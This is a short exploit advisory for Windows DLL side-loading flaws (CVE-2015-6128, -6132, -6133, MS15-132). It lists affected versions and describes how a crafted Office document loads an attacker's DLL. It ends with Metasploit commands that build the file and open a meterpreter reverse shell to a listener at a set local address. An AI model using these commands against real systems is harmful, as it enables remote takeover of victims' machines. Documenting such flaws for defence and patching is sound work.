Timeline :
Vulnerabilities discovered and reported to the vendor by multiple security researchers
Patched by the vendor via MS15-132 the 2015-12-06
Metasploit PoC provided the 2015–12-25 by Securify
PoC provided by :
Yorick Koster
Reference(s) :
CVE-2015-6128
CVE-2015-6132
CVE-2015-6133
MS15-132
Affected version(s) :
CVE-2015-6128 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2
CVE-2015-6132 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2, 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10
CVE-2015-6133 affects Windows 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10
Tested on :
with Microsoft Office 2013 SP1 on Windows 7 SP1
Description :
Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.
Commands :
use exploit/windows/fileformat/ms15_132_dll_sideload set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run Share the output in a remote share folder use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid sysinfo